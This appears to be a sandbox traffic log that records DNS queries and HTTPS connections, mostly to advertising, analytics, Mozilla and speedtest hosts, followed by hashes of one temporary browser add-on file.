US 34.36.216.150:443 pixel-sync.sitescout.com udp
DE 3.122.49.211:443 sonata-notifications.taptapnetworks.com tcp
US 1.1.1.1:53 qvdt3feo.com udp
US 1.1.1.1:53 qvdt3feo.com udp
US 100.26.75.222:443 qvdt3feo.com tcp
US 34.111.131.239:443 idsync.frontend.weborama.fr udp
US 1.1.1.1:53 simage4.pubmatic.com udp
US 1.1.1.1:53 simage4.pubmatic.com udp
US 1.1.1.1:53 spug-amsfpairbc.pubmnet.com udp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
US 1.1.1.1:53 prod.sumo.prod.webservices.mozgcp.net udp
US 1.1.1.1:53 us-west1.prod.sumo.prod.webservices.mozgcp.net udp
NL 178.250.1.3:443 static.criteo.net tcp
US 1.1.1.1:53 ids.ad.gt udp
US 1.1.1.1:53 ids.ad.gt udp
US 1.1.1.1:53 secure.adnxs.com udp
US 1.1.1.1:53 secure.adnxs.com udp
US 54.69.26.145:443 ids.ad.gt tcp
US 1.1.1.1:53 ib.anycast.adnxs.com udp
US 54.69.26.145:443 ids.ad.gt tcp
US 1.1.1.1:53 u.openx.net udp
US 1.1.1.1:53 u.openx.net udp
US 1.1.1.1:53 sync.go.sonobi.com udp
US 1.1.1.1:53 sync.go.sonobi.com udp
US 54.69.26.145:443 ids.ad.gt tcp
US 1.1.1.1:53 sync.smartadserver.com udp
US 1.1.1.1:53 sync.smartadserver.com udp
US 1.1.1.1:53 p.ad.gt udp
US 1.1.1.1:53 p.ad.gt udp
DE 37.252.171.53:443 secure.adnxs.com tcp
US 1.1.1.1:53 privacyportal.onetrust.com udp
US 1.1.1.1:53 privacyportal.onetrust.com udp
US 35.244.159.8:443 u.openx.net tcp
US 69.166.1.35:443 sync.go.sonobi.com tcp
DE 141.95.33.120:443 lb.eu-1-id5-sync.com tcp
DE 141.95.33.120:443 lb.eu-1-id5-sync.com tcp
US 1.1.1.1:53 rtb-csync-euw1.smartadserver.com udp
US 172.64.155.119:443 privacyportal.onetrust.com tcp
US 35.244.159.8:443 u.openx.net udp
FR 91.134.110.137:443 sync.smartadserver.com tcp
NL 178.250.1.3:443 static.criteo.net tcp
US 1.1.1.1:53 06eb8ccb72f1161b711b442227a0f4ec.safeframe.googlesyndication.com udp
US 1.1.1.1:53 06eb8ccb72f1161b711b442227a0f4ec.safeframe.googlesyndication.com udp
GB 172.217.169.65:443 06eb8ccb72f1161b711b442227a0f4ec.safeframe.googlesyndication.com tcp
DE 37.252.171.53:443 secure.adnxs.com tcp
US 1.1.1.1:53 secure-us.imrworldwide.com udp
US 1.1.1.1:53 secure-us.imrworldwide.com udp
US 1.1.1.1:53 census.eu-west-1.nielsencollections.com udp
US 1.1.1.1:53 region1.analytics.google.com udp
US 1.1.1.1:53 region1.analytics.google.com udp
US 1.1.1.1:53 www.google.co.uk udp
US 1.1.1.1:53 www.google.co.uk udp
IE 34.255.238.146:443 secure-us.imrworldwide.com tcp
US 216.239.34.36:443 region1.analytics.google.com tcp
GB 172.217.169.35:443 www.google.co.uk tcp
US 1.1.1.1:53 id5-sync.com udp
US 216.239.34.36:443 region1.analytics.google.com udp
GB 172.217.169.65:443 06eb8ccb72f1161b711b442227a0f4ec.safeframe.googlesyndication.com udp
US 1.1.1.1:53 tpc.googlesyndication.com udp
US 1.1.1.1:53 tpc.googlesyndication.com udp
GB 172.217.169.35:443 www.google.co.uk udp
GB 142.250.187.225:443 tpc.googlesyndication.com tcp
US 1.1.1.1:53 cdn-gl.imrworldwide.com udp
US 1.1.1.1:53 cdn-gl.imrworldwide.com udp
GB 108.156.46.101:443 cdn-gl.imrworldwide.com tcp
US 1.1.1.1:53 d.turn.com udp
US 1.1.1.1:53 d.turn.com udp
GB 142.250.187.225:443 tpc.googlesyndication.com udp
NL 46.228.164.13:443 d.turn.com tcp
US 1.1.1.1:53 www.google.com udp
GB 172.217.169.68:443 www.google.com tcp
US 1.1.1.1:53 bee.imrworldwide.com udp
US 1.1.1.1:53 bee.imrworldwide.com udp
GB 172.217.169.68:443 www.google.com udp
US 1.1.1.1:53 cdn.ampproject.org udp
US 1.1.1.1:53 cdn.ampproject.org udp
GB 142.250.180.1:443 cdn.ampproject.org tcp
GB 142.250.180.1:443 cdn.ampproject.org tcp
GB 142.250.180.1:443 cdn.ampproject.org tcp
GB 142.250.180.1:443 cdn.ampproject.org tcp
GB 142.250.180.1:443 cdn.ampproject.org tcp
GB 142.250.180.1:443 cdn.ampproject.org udp
US 1.1.1.1:53 googleads.g.doubleclick.net udp
US 1.1.1.1:53 googleads.g.doubleclick.net udp
GB 216.58.212.226:443 googleads.g.doubleclick.net tcp
GB 216.58.212.226:443 googleads.g.doubleclick.net tcp
GB 216.58.212.226:443 googleads.g.doubleclick.net tcp
US 1.1.1.1:53 fw.adsafeprotected.com udp
US 1.1.1.1:53 fw.adsafeprotected.com udp
US 1.1.1.1:53 firewall-external-2134955858.eu-west-1.elb.amazonaws.com udp
US 1.1.1.1:53 track.adform.net udp
US 1.1.1.1:53 track-eu.adformnet.akadns.net udp
IE 52.30.57.118:443 fw.adsafeprotected.com tcp
DK 37.157.6.232:443 track.adform.net tcp
GB 216.58.212.226:443 googleads.g.doubleclick.net udp
US 1.1.1.1:53 uipglob.semasio.net udp
US 1.1.1.1:53 uipglob.semasio.net udp
US 1.1.1.1:53 us-u.openx.net udp
US 1.1.1.1:53 us-u.openx.net udp
US 1.1.1.1:53 uip.semasio.net udp
US 104.22.4.69:443 p.ad.gt tcp
US 34.98.64.218:443 us-u.openx.net tcp
US 1.1.1.1:53 sync.teads.tv udp
US 1.1.1.1:53 sync.teads.tv udp
DK 77.243.51.122:443 uipglob.semasio.net tcp
US 1.1.1.1:53 e9957.e4.akamaiedge.net udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 dsum-sec.casalemedia.com udp
GB 2.18.109.35:443 sync.teads.tv tcp
US 1.1.1.1:53 dsum-sec.casalemedia.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 172.64.151.101:443 dsum-sec.casalemedia.com tcp
US 34.98.64.218:443 us-u.openx.net udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 172.64.151.101:443 dsum-sec.casalemedia.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 sync.search.spotxchange.com udp
US 1.1.1.1:53 a.ad.gt udp
US 1.1.1.1:53 a.ad.gt udp
US 1.1.1.1:53 pixels.ad.gt udp
US 1.1.1.1:53 pixels.ad.gt udp
US 104.22.4.69:443 pixels.ad.gt tcp
US 1.1.1.1:53 s0.2mdn.net udp
US 1.1.1.1:53 s0.2mdn.net udp
US 172.67.23.234:443 pixels.ad.gt tcp
GB 142.250.178.6:443 s0.2mdn.net tcp
GB 142.250.178.6:443 s0.2mdn.net udp
US 1.1.1.1:53 d289cm8jitwx96.cloudfront.net udp
GB 108.156.46.76:443 bee.imrworldwide.com tcp
US 1.1.1.1:53 dis.eu.criteo.com udp
US 1.1.1.1:53 widget.fr3.vip.prod.criteo.com udp
FR 178.250.7.11:443 dis.eu.criteo.com tcp
US 216.239.34.36:443 region1.analytics.google.com udp
US 1.1.1.1:53 lja4epewjhwu3jb0iot2yotwob9p71720959803.nuid.imrworldwide.com udp
US 1.1.1.1:53 lja4epewjhwu3jb0iot2yotwob9p71720959803.nuid.imrworldwide.com udp
GB 216.137.44.100:443 lja4epewjhwu3jb0iot2yotwob9p71720959803.nuid.imrworldwide.com tcp
GB 45.10.101.252:8080 speedtest.boxbroadband.co.uk.prod.hosts.ooklaserver.net tcp
GB 45.10.101.252:8080 speedtest.boxbroadband.co.uk.prod.hosts.ooklaserver.net tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.49:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 p.rfihub.com udp
US 1.1.1.1:53 p.rfihub.com udp
US 1.1.1.1:53 match.prod.bidr.io udp
DK 77.243.51.122:443 uipglob.semasio.net tcp
US 1.1.1.1:53 csync.loopme.me udp
US 1.1.1.1:53 csync.loopme.me udp
US 1.1.1.1:53 pixel.onaudience.com udp
US 1.1.1.1:53 pixel.onaudience.com udp
US 1.1.1.1:53 ipac.ctnsnet.com udp
US 1.1.1.1:53 d5p.de17a.com udp
US 1.1.1.1:53 d5p.de17a.com udp
US 1.1.1.1:53 core.iprom.net udp
US 1.1.1.1:53 core.iprom.net udp
US 1.1.1.1:53 cm-supply-web.gammaplatform.com udp
US 1.1.1.1:53 cm-supply-web.gammaplatform.com udp
US 1.1.1.1:53 a-emea.rfihub.com.akadns.net udp
US 1.1.1.1:53 match.prod.bidr.io udp
US 1.1.1.1:53 envoy-hl.envoy-csync1.core-b8mf.ov1o.com udp
US 1.1.1.1:53 ipac.ctnsnet.com udp
US 1.1.1.1:53 cm.adgrx.com udp
US 1.1.1.1:53 cm.adgrx.com udp
FR 54.38.113.5:443 pixel.onaudience.com tcp
US 1.1.1.1:53 green.erne.co udp
US 1.1.1.1:53 green.erne.co udp
SE 213.155.156.185:443 d5p.de17a.com tcp
US 1.1.1.1:53 a.tribalfusion.com udp
US 1.1.1.1:53 matching.truffle.bid udp
US 1.1.1.1:53 matching.truffle.bid udp
US 1.1.1.1:53 a.tribalfusion.com udp
SI 195.5.165.20:443 core.iprom.net tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 1.1.1.1:53 sync.1rx.io udp
US 1.1.1.1:53 sync.1rx.io udp
NL 193.0.160.130:443 p.rfihub.com tcp
US 1.1.1.1:53 ad.turn.com udp
US 1.1.1.1:53 ad.turn.com udp
IE 46.51.206.207:443 match.prod.bidr.io tcp
NL 35.214.232.33:443 csync.loopme.me tcp
US 1.1.1.1:53 match.adsby.bidtheatre.com udp
US 1.1.1.1:53 rtb.adgrx.com udp
US 35.186.193.173:443 ipac.ctnsnet.com tcp
FR 141.94.242.204:443 green.erne.co tcp
US 104.18.24.173:443 a.tribalfusion.com tcp
DE 162.55.120.196:443 matching.truffle.bid tcp
NL 46.228.174.117:443 sync.1rx.io tcp
IE 52.215.155.11:443 cm.adgrx.com tcp
NL 46.228.164.11:443 ad.turn.com tcp
NL 64.227.64.62:443 match.adsby.bidtheatre.com tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 1.1.1.1:53 cms.analytics.yahoo.com udp
US 1.1.1.1:53 ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud udp
US 35.186.193.173:443 ipac.ctnsnet.com udp
DE 3.75.62.37:443 cms.analytics.yahoo.com tcp
US 104.18.24.173:443 a.tribalfusion.com udp
US 1.1.1.1:53 pixel-eu.onaudience.com udp
US 1.1.1.1:53 pixel-eu.onaudience.com udp
FR 54.38.113.7:443 pixel-eu.onaudience.com tcp
US 1.1.1.1:53 s.tribalfusion.com udp
US 1.1.1.1:53 s.tribalfusion.com udp
US 104.18.25.173:443 s.tribalfusion.com tcp
US 104.18.25.173:443 s.tribalfusion.com udp
US 1.1.1.1:53 rtb-csync-euw2.smartadserver.com udp
US 1.1.1.1:53 sync.targeting.unrulymedia.com udp
US 1.1.1.1:53 sync.targeting.unrulymedia.com udp
FR 91.134.110.137:443 sync.smartadserver.com tcp
US 1.1.1.1:53 sync.1rx.io udp
NL 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
US 1.1.1.1:53 bh.contextweb.com udp
US 1.1.1.1:53 bh.contextweb.com udp
US 1.1.1.1:53 am1-direct-bgp.contextweb.com udp
NL 208.93.169.131:443 bh.contextweb.com tcp
NL 208.93.169.131:443 bh.contextweb.com tcp
US 216.239.34.36:443 region1.analytics.google.com udp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
IE 46.51.206.207:443 match.prod.bidr.io tcp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
GB 193.3.26.19:8080 speedtest.upp.com.prod.hosts.ooklaserver.net tcp
GB 31.22.12.17:8080 speedtest.swishfibre.com.prod.hosts.ooklaserver.net tcp
GB 51.148.82.21:8080 speedtest02a.web.zen.net.uk.prod.hosts.ooklaserver.net tcp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
US 1.1.1.1:53 pugm-lhrc.pubmnet.com udp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
GB 50.7.152.4:8080 lg-lon.fdcservers.net tcp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
US 1.1.1.1:53 lg-lon.fdcservers.net udp
US 1.1.1.1:53 www.speedtest.net.cdn.cloudflare.net udp
US 1.1.1.1:53 zdbb.net udp
US 1.1.1.1:53 zdbb.net udp
US 1.1.1.1:53 region1.analytics.google.com udp
US 1.1.1.1:53 www.google.co.uk udp
GB 172.217.169.35:443 www.google.co.uk udp
US 216.239.34.36:443 region1.analytics.google.com udp
US 216.239.34.36:443 region1.analytics.google.com tcp
IE 46.51.206.207:443 match.prod.bidr.io tcp
US 1.1.1.1:53 dpm.demdex.net udp
US 1.1.1.1:53 dpm.demdex.net udp
US 1.1.1.1:53 dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com udp
US 1.1.1.1:53 d1jvc9b8z3vcjs.cloudfront.net udp
US 1.1.1.1:53 d1jvc9b8z3vcjs.cloudfront.net udp
US 1.1.1.1:53 dualstack.zd.map.fastly.net udp
US 1.1.1.1:53 bidder.nl3.vip.prod.criteo.com udp
NL 178.250.1.8:443 bidder.criteo.com tcp
US 1.1.1.1:53 ib.anycast.adnxs.com udp
DE 37.252.171.53:443 secure.adnxs.com tcp
US 1.1.1.1:53 tagged-by.rubiconproject.net.akadns.net udp
NL 69.173.156.139:443 tagged-by.rubiconproject.net.akadns.net tcp
US 1.1.1.1:53 hbopenbid-ams.pubmnet.com udp
US 1.1.1.1:53 btlr.sharethrough.com udp
US 1.1.1.1:53 rtb.openx.net udp
DE 52.58.68.208:443 btlr.sharethrough.com tcp
US 1.1.1.1:53 htlb.casalemedia.com udp
US 1.1.1.1:53 htlb.casalemedia.com udp
US 1.1.1.1:53 c2shb.one-mobile-prod.aws.oath.cloud udp
US 1.1.1.1:53 c2shb.one-mobile-prod.aws.oath.cloud udp
US 1.1.1.1:53 btlr-eu-central-1.sharethrough.com udp
DE 52.58.68.208:443 btlr.sharethrough.com tcp
DE 52.58.68.208:443 btlr.sharethrough.com tcp
US 35.227.252.103:443 rtb.openx.net udp
US 172.64.151.101:443 htlb.casalemedia.com udp
US 1.1.1.1:53 securepubads.g.doubleclick.net udp
GB 216.58.204.66:443 securepubads.g.doubleclick.net udp
US 1.1.1.1:53 cdn-content.ampproject.org udp
GB 142.250.180.1:443 cdn.ampproject.org udp
GB 142.250.187.225:443 tpc.googlesyndication.com udp
US 1.1.1.1:53 www.google.com udp
GB 172.217.169.68:443 www.google.com udp
IE 52.49.217.19:443 dpm.demdex.net tcp
US 1.1.1.1:53 ps.eyeota.net udp
US 1.1.1.1:53 ps.eyeota.net udp
DE 3.127.178.105:443 ps.eyeota.net tcp
US 1.1.1.1:53 census.eu-west-1.nielsencollections.com udp
US 1.1.1.1:53 census.eu-west-1.nielsencollections.com udp
US 1.1.1.1:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 1.1.1.1:53 aus5.mozilla.org udp
US 1.1.1.1:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 1.1.1.1:53 us-west1.prod.sumo.prod.webservices.mozgcp.net udp
US 1.1.1.1:53 us-west1.prod.sumo.prod.webservices.mozgcp.net udp
US 1.1.1.1:53 stats.g.doubleclick.net udp
US 1.1.1.1:53 stats.g.doubleclick.net udp
GB 74.125.206.156:443 stats.g.doubleclick.net tcp

Files

/tmp/tmpaddon

MD5 30082ae40dc48af6343db2fd22cfc645
SHA1 3eb577555ee638e8beb01173e8f29e172747a728
SHA256 85d4b95f9b2075daee9b0e64bce8d9d7343d0dda10e6072d7f9485a68472ee76
SHA512 53a58bfb4c8124ad4f7655b99bfdea290033a085e0796b19245b33b91c0948fdac9f0c3e817130b352493a65d9a7a0fc8a7c1eedc618cdaa2b4580734a11cd9c